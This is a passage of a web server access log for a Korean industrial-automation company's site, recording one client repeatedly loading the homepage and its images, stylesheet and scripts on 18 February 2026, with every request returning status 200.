AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10486] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10493] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:10:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1865] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:16:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:19:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 